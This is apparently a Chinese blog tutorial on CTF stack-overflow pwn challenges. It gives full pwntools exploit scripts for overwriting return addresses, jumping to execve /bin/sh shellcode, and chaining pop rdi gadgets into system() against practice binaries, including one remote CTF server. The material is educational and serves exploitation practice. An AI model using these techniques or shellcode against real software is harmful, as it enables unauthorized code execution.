CTF中的PWN—(栈溢出)

本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。

 满足函数条件类型
    很low的命名~///这种类型就是通过栈溢出使函数栈内满足某种条件则执行自带的system函数的类型,下面是此类型题目的例子:

    题目:bof
    放入IDA中查看:

 

    可以看到存在get()危险函数,可接收任意长度的输入并存到变量s的地址&s中。当变量a1等于 0xcafebabe即可,可以看到字符s距离ebp为0x2c,则距离形参a1为0x2c+0x8=52u。则payload如下:

from pwn import *

p = process('./bof')

payload = 52 * 'A' + p32(0xcafebabe)

p.recvuntil('overflow me :')
p.sendline(payload)
p.interactive()
运行结果如下:

 

使用shellcode类型
    32bit程序传参方式是将参数从右到左依次入栈,同时构造call指令时需要伪造PUSH EIP指令。

    题目一:stack2
    首先用file命令看一下文件为32位的elf文件:

 

    其次使用checksec查看软件的防护措施:

 

    没有防护,拖入IDA分析,可以看到危险函数strcpy():

 

    &dest的EIP偏移量为0x14 + 0x4 = 24u,使用gdb打开程序,查找函数栈中call esp或jmp esp的地址以便call esp到我们的shellcode起始地址上:

 

    选择call esp地址为0x08048577,payload如下:

from pwn import *

p = process('./stack2')

shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

callesp = 0x08048577

payload = 24 * 'A' + p32(callesp) + shellcode

p.recvuntil('please input password:')
p.sendline(payload)
p.interactive()
    脚本运行如下:

 

    题目二:stack2
    注意:使用shellcode类型的有两种溢出方式,第一种是将shellcode溢出到溢出点函数栈外面,第二种是溢出在溢出点函数栈内部,但是由于每次加载地址都会变,所以可能十次溢出只能成功两次。

    将程序拖入IDA中查看,存在危险函数,但是首先程序中无system函数及/bin/sh或cat flag等敏感参数,其次在gdb中使用ropsearch "call esp"不管用,,,同时每次程序的溢出点地址都暴露出来了:

 

 

    通过程序泄露出的溢出点的地址,可以保证每次都能将shellcode的起始地址溢出到返回地址以执行,payload如下:

from pwn import *

p = process('./level1')

shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

recv = p.recv(23)
buf_addr = recv[14:-1]
payload = shellcode + 'A' * (140 - len(shellcode)) + p32(int(buf_addr,16))

p.sendline(payload)
p.interactive()
     脚本运行结果如下:

 

 

自带system函数类型
64bit:
    题目一:bugku_pwn2
    首先查看文件类型为64bit且无防护措施:

 

    拖入IDA64中发现了read()危险函数,可以通过此函数进行栈溢出操作:

 

    同时发现有getshell函数:

 

   思路一:思路为溢出函数地址到EIP即可 ,而溢出点到EIP返回地址的偏移量为0x30 + 0x8 = 56u此处可以写getshell的地址,也可以写system的地址,不过首地址要写压入参数的指令的地址。下图分别为getshell函数地址与system('cat flag')的地址:

 

 

 

     注意:如果使用call system(‘cat flag’)执行的话,必须要在0x400769 将cat flag压入rdi中的edi中进行传参,如果直接40076E是无参数的。同时指令是按顺序执行的,也就是执行完mov edi, 'cat flag'后会继续执行 call _system。 

    下面的payload中以getshell函数的地址为例: 

from pwn import *

p = process('./pwn2')

system_addr = 0x400751
payload = 'A' * 56 + p64(system_addr)

p.recvuntil('say something?')
p.sendline(payload)
p.interactive()
    运行后执行了cat flag:

 

     思路二:另一种做法是自己给system函数添加参数,由于64位程序前七个参数从左到右一次使用寄存器传参,首先需要找到指令pop rdi指令进行参数的调整:

 

需要将pop rdi + p64(& cat flag) + system()溢出到返回地址上,则payload如下:

from pwn import *

p = process('./pwn2')

system_addr = 0x40076E
arg_addr = 0x400857
pop_rdi = 0x4007e3

payload = 'A' * 56 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)

p.recvuntil('say something?')
p.sendline(payload)
p.interactive()
    运行如下: 

 

 题目二:bugku_pwn4
    放入IDA64中查看,发现read()危险函数:

 

    查看函数发现system()函数,其他函数没啥意义,查一下字符串:

 

    发现”$0“,注意,$0相当于bin/sh。也就是system('$0') == system('bin/sh') 。那么做题思路就是给system函数中传入$0参数即可。使用ROPgadget --binary "pwn4" --string ’\$0‘来查看字符串$0的地址:

 

     查找pop rdi的地址位0x4007d3。溢出点距返回地址位0x10 + 0x8 = 24u

    payload如下:

from pwn import *

p = process('./pwn4')

pop_rdi = 0x4007d3
arg_addr = 0x60111f
system_addr = 0x40075A

payload = 'A' * 24 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)

p.recvuntil('Come on,try to pwn me')
p.sendline(payload)
p.interactive()
    运行如下:

 

 题目三:Jarvis OJ_tell me something
    拖入IDA64中查看发现有危险函数get()与函数goodgame(),只需要将goodgame函数地址溢出到返回地址执行即可,写payload后怎么都无法执行,后来看了一下汇编,发现有一个坑,正常call 函数都是push rbp  mov rbp,rsp  sub rsp xxx。

但是这个程序没有进行push rbp:(注:此处直接rsp减 88h,距离rip直接为88h。反汇编使用rbp - 88h表示,尽管没有push rbp!!!)

 

    所以溢出点距离返回值的偏移不用再加0x8即可,payload如下:

 

from pwn import *

p = remote('pwn.jarvisoj.com',9876)

system = 0x400620

payload = 'A' * 136 + p64(system)

p.recvuntil('Input your message:')
p.sendline(payload)
p.interactive()
     运行如下:

 

32bit:
题目一:Jarvis OJ_level2
    拖入IDA查看发现危险函数read(),查找字符串/bin/sh的地址及system函数的地址。由于程序时32bit的,所以传参的时候需要伪造EIP返回地址才能执行system函数,payload构造姿势是:溢出到返回地址 + call system + 伪造EIP(‘aaaa’) + arg。

payload构造如下:

from pwn import *

p = process('./level2')

sys_addr = 0x8048320
arg_addr = 0x804A024

payload = 'A' * 140 + p32(sys_addr) + 'nEIP' + p32(arg_addr)

p.recvuntil('Input:')
p.sendline(payload)
p.interactive()
    脚本执行如下:

posted @ 2019-12-27 09:51  渗透测试回忆录  阅读(5034)  评论(0编辑  收藏  举报